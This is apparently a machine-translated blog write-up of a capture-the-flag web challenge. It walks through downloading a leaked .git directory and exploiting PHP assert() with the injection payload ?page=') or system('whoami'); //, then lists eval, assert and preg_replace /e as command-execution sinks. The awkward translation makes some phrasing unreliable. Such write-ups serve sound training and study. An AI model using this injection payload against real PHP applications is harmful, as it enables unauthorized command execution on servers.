Knowledge point 1：git Let the cat out of the

Knowledge point 2：assert Command Execution Vulnerability of function

Problem solving

Step one

First line directory scan , Find out git Let the cat out of the

Found out git Let the cat out of the , adopt githack The tool downloads it  

  Get into dist View in file

After checking one by one , Found out index.php There are loopholes in , namely assert function

Step two  

 assert Principle of Command Execution Vulnerability of function ： When assert() The parameter in the string is , That string will be treated as php Function execution （ Just like eval almost ）

 Notice these two lines of code 
$file = "templates/" . $page . ".php";
assert(strops('$file','..') === false)

 When page = ') // when 
file = templates/') 
assert The code in is  strops('templates/')  Because of grammar problems, it directly reports errors , But it can go through  or  To execute orders 
 Such as  page = ') or system('whoami') //
file = templates/') or system('whoami')
assert The code is  strops(templates/') or system('whoami')
 because  strops The function reported an error , So execute or Subsequent statements , namely whoami

 Combine the above ideas to construct pyaload
?page=') or system('whoami'); //

It should be noted that ,php A semicolon is required at the end of the statement

Next is the normal Command Execution Vulnerability

Add

php Function with Command Execution Vulnerability , The basic principle is that the parameters in brackets will be treated as php Code execution , And then you can go through system() Function to execute the command line

1.eval() The most common

2.assert() If a function is nested in a function , May adopt or To bypass ( As above strops function )

3.preg_replace() ,/e Pattern has a vulnerability in command execution

Attack and defend the world ----ics-05_jjj34 The blog of -CSDN Blog